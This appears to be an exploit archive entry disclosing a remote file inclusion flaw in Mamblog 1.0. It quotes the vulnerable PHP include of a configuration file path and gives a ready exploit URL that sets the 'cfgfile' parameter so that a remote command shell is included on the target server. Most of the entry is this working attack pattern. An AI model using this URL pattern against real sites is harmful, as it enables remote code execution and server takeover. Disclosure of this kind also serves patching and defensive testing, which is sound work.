Mamblog version 1.0 suffers from a remote file inclusion flaw.
e95cb66ae78166423e6c8ab33da4a2466e3ae26df71c8254faf94e3b241185bc
# SaVSaK.CoM | SpC-x - The-BeKiR |
# Mamblog 1.0 Version - Remote File Include Vulnerabilities
# Risk : High
# Class: Remote
# Script : Mamblog
# Credits : SpC-x
# Thanks : The-BeKiR - Ejder - FasTBoY - ERNE - RMx - Nukedx - Str0ke
# Code :
# $cfgfile = "$mosConfig_absolute_path/components/$option/configuration.php";
# include_once( $cfgfile );
# Vulnerable :
# http://www.victim.com/Mamblog/admin.mamblog.php?cfgfile=Command-Shell